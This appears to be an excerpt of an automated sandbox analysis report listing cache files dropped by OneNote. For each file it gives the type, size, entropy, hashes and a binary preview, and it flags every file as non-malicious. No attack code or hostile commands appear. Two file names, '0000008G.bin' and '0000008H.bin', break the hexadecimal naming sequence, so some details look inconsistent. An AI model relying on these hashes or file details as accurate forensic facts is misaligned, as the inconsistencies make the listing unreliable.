Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.340763741610726
Encrypted:	false
SSDEEP:	48:WsnYheEg7tB3/uEyLgFTXEQ9JUipyhrdMrC/LFXQxTI4CFN0ll:WsweEg7yEy05Xb9ai0RMY6ibN0l
MD5:	B03E05E6073446C560786F833B92F56C
SHA1:	6B33ADEA433965A9BDC025A1C8BF0DB2B78F2437
SHA-256:	E9D4B864FB64E39ACC116C2D7391E75D1C6D9D19BA2F56BF69C859377DC617F2
SHA-512:	7FB46BFB1A04BD53003CB7022F789C2B54CF5071FE303B82E523D7993AD32862A618455A5A7835C9BB874F995EDCA646FECB60C9983BAE9A53D40DCA79A3C85E
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v...........................M[......M[...y..........I.......I.qk..B.....LZM[...y.........M[...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............A.1..%@..h.......N...^...............7.....D......3.........f........................................I.qk..B.....LZ..............A.1..%@..h.............A.1..%@..h............M[......M[......M[..........................................M[.j....M[.T.]..M[......M[...B..M[.H....M[...B..M[...>.)M[...J...................;........4...4...4.."..............M[..M[..M[...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........M[......M[.....#M[.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000081.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000082.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.343264298707097
Encrypted:	false
SSDEEP:	96:wsW1PfOGfEdnXaz9CtYRM7EE5DRLGSgLD/SC:wsafmdnXaz9yYRM7v9
MD5:	3985315A42285AD705FA8D506F847382
SHA1:	F534C719A910B3EA8477400B409F5D698B4A6A66
SHA-256:	800B4A8F97EDBFCB98263344D186BDC970770340CA76863D7B426F83A3F0E4A1
SHA-512:	7D3FCCE957B6F032235C652A5CF32E70937304920708C851DD4A05704953B8F847C58AC56BF02D8AAA459B5C0C89101C53CAAE21A872EB400E9CE87AE4ECC116
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZLR......LR.t.....9p.m9KLR.t.....9p.m9KLR...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............F.4.....D[..\|.....N...^...................o.yF.../N.U.........f........................................I.qk..B.....LZ..............F.4.....D[..\|...........F.4.....D[..\|..........LR......LR......LR..........................................LR.j....LR.T.]..LR......LR..B..LR.H....LR...B..LR...>.)LR...J...................;........4...4...4.."..............LR..LR..LR...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........LR......LR.....#LR.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000083.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000084.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.448270304337366
Encrypted:	false
SSDEEP:	48:3RZ1pZ1psLKG12kNIiMtt9E15LZBX8q9JUzpyVrdMruUBEX2FXthkB7Mg:3RVVsRIkNIiMZEDTX79azYRMxT+M
MD5:	340325447A0FF361DDF53376C3EA0F20
SHA1:	05DB5363EC13F62A9870EB5753537BD0C170B7F1
SHA-256:	75C95587541EC27FBD316B95AE1AC43CAB8752008C4C37693402131F8AA1B0C7
SHA-512:	57173C59023D234BF629C8D76F1D56102E7B59B72B87A9AF7B3DE6A9290FA358387E673311F12D70CDE92C049EDECEE935399151C6516463127DAAB5FC049DA5
Malicious:	false
Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ$!h.....$!h7]W.....Y1...$!h7]W.....Y1...$!h..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............ViC.i;.... .Q......N...^...............Y...9.@A.k.[.(%=........f........................................I.qk..B.....LZ.............ViC.i;.... .Q...........ViC.i;.... .Q...........$!h.....$!h.....$!h.........................................$!hj....$!hT.]..$!h.....$!h..B..$!hH....$!h..B..$!h..>.)$!h..J...................;........4...4...4.."..............$!h.$!h.$!h..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........$!h.....$!h....#$!h............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000085.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000086.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345048837783603
Encrypted:	false
SSDEEP:	96:KsZmAIL/CEjx/XXr9CWYRMEkfws8m5NX86C1:KsZmAILHjx/Xb9lYRMRwk
MD5:	51B74111B496D2C23F5195A232765F2D
SHA1:	9299B0B00B308A632053BEC9D3F2A31BEFFE87BC
SHA-256:	B35B63723056CCE329272667E8ECBA1152DC7E9016DF8A7D7C4C6179860ADA98
SHA-512:	2F6A67309DC6102D036D7647468DC291035F92EF6B354D77C377324646D40E2D16C689FE47A7583774B1FC1C6945698D1C58FC3F69DC6694D0A13F35A9E5C7CB
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ./....../Wj...5...:..../Wj...5...:..../..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............j.@...qQ..T.....N...^.................x...YN...m...J........f........................................I.qk..B.....LZ..............j.@...qQ..T...........j.@...qQ..T.........../....../....../........................................../j...../T.].../....../..B.../H...../..B.../..>.)./..J...................;........4...4...4..".............../../../..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........../....../....#./............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000087.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000088.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.660376540018292
Encrypted:	false
SSDEEP:	96:EsBTgI4XEtUqJ0cXDc9CacRMk0lRGMtolH+Sd:EsBTgX0KaRXA95cRMk0lRGMtoleSd
MD5:	9F009C4A6E3DBDA102D71C26A462BDD0
SHA1:	B3AAACB4B99BF7F56086CB0DA5D095B8B240AFE4
SHA-256:	7899D67BBA9135D53E069A4041A64D3C1D9259AD8214F10AD49A1C4E59624E15
SHA-512:	DBD4B736205D4E79F68329E59CC923176FF0894CF6D4A04E20C8ACBD6B8A88C5B2A6F76518B270A50314FD3DF41F93E58B1AE3806AB64BAE13620911D9441151
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...t.......v................................I.......I.qk..B.....LZ...........([...&m;vC. ....([...&m;vC. ......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............O...fIW.+./........N...^..................&...D.......I........f...................................H....I.qk..B.....LZ............O...fIW.+./............O...fIW.+./............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000089.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.334951732626413
Encrypted:	false
SSDEEP:	48:dosRwTUSKyMLtKlMuElLuQXtB7z9dUodpyVrdMrCUedFX6sRlGtS9nxJ1FASECRY:dosOMLSEl/Xrf9eK4RMQHR//CCRQ10
MD5:	B8C501417D1D35E2D42E5FA1F1F83F30
SHA1:	8658A5579D0F3E1D5A23C99E471A11C83BD78AEC
SHA-256:	868393228CA0E234447E2EE7BA1311F9F63B9EF692509AC0158C5CA4BB5A4B1C
SHA-512:	F3D9ED45EB7579E3652210016CAE5D3D6F1306520A02A0212BFFCA12CB8AF3CC2AD554EFB697A26EBCB93E78700658FD17FE1F1FD8BCC020B49CC2DD6D36904A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ6.......6...]...'....A..6...]...'....A..6....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............Y<Y....'W..........N...^...............S.?A.I.H.y...v).........f........................................I.qk..B.....LZ.............Y<Y....'W...............Y<Y....'W...............6.......6.......6...........................................6..j....6..T.]..6.......6....B..6..H....6....B..6....>.)6....J...................;........4...4...4.."..............6...6...6....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........6.......6......#6..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.9180656283213158
Encrypted:	false
SSDEEP:	48:Zs7QBPhYtZs9iE1LN9NVSL6Mhw3XnWFV9RrsdpyFrdMrHfNvFXlVzyDS4p:Zs8lhYrUiE1fN0fEXoV9hIIRMHFvs9
MD5:	688DE4DBFA54EC5706BD914CC5944E21
SHA1:	9668B57FD3A06A9F5D9D78086176AB9E4E8B829E
SHA-256:	0EFA14F958E385AEC22290EB52D4AD8ABA39855A4CE75C6757E1BE142472CB95
SHA-512:	4F1404DAE29E21763470A6F7ADA4B4F36AB5BD20AF46830BFBDD2857C0B1F9F2A0CD3D3B599C461C6EFE82FEF48008C993A78BED26DDD760193BB1B08CED1E05
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......H...v................................I.......I.qk..B.....LZ.(......(7.ru.".cHQx...(7.ru.".cHQx...(..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............F.......'..:k.....N...^..................a..A..B..T..........f........................................I.qk..B.....LZ.............F.......'..:k..........F.......'..:k...........(......(......(..........................................(j.....(T.]...(......(..B...(H.....(..B...(..>.).(..J...................;........4...4...4.."...............(..(..(..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........(......(....#.(............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.303699409256024
Encrypted:	false
SSDEEP:	96:dRKsuqfyXOJr+SlEX2E0Xh9N3QRM1PefEzwWPY:dRKsuqfWS+SM0Xh9N3QRM1PefEzwW
MD5:	5E9E2E9E4D634C226F2B434C2FB0077F
SHA1:	C6FC7A1E39EB8813AB1A0C4F6FADA394412A6245
SHA-256:	6F3B84E4C03120C712626B844306B96375966D7AFFC057E87F9A0746BF27B4F9
SHA-512:	A5E1FD647D0B5A72856659AAD2120C3DF448E0EFE5BBE2BA3EB93D8A58968C07DA6CE98221701AA8DBB789AD865133F266653FCE84912233BDC279B1D0EA7563
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.@.......@.nx............@.nx............@...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Q8..\|W<...=.>.b....N...^................E@9.x.O..[/.~Ql........f........................................I.qk..B.....LZ............Q8..\|W<...=.>.b........Q8..\|W<...=.>.b..........@.......@.......@...........................................@.j.....@.T.]...@.......@...B...@.H.....@...B...@...>.).@...J...................;........4...4...4.."...............@...@...@...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........@.......@.....#.@.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3366258873297
Encrypted:	false
SSDEEP:	48:escZe23Tqk/KWtVX8E3yddX6Xe9Vs2pylrdMrXpCzmFXE4nXGO7hAAnOEerWi:esY3TqCKWMEEX6O9V/QRMXvX2E
MD5:	B227D2D3E4049CF4C3CE50975D1FBE60
SHA1:	98B08A130A7235ED86D831A6F8C311631721B6EC
SHA-256:	F7A8ACEC954FF3A24DCCD272AC5C09F5FC074F3D51196A202B38FBDA70ED43B9
SHA-512:	D2012872384D258484ED0380F726E5CD45F3558FD2548F79594F67C64DEC209026FA8DA0A0212C022CCD888B5D7492E2058A47DE9F0F4CA8F234BE4F89AA60FF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.T.......T.C.........H.T.C.........H.T...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'......................X.j.}9.....N...^............... I...tE..m............f........................................I.qk..B.....LZ.....................X.j.}9..................X.j.}9...........T.......T.......T...........................................T.j.....T.T.]...T.......T..B...T.H.....T...B...T...>.).T...J...................;........4...4...4.."...............T...T...T...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........T.......T.....#.T.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
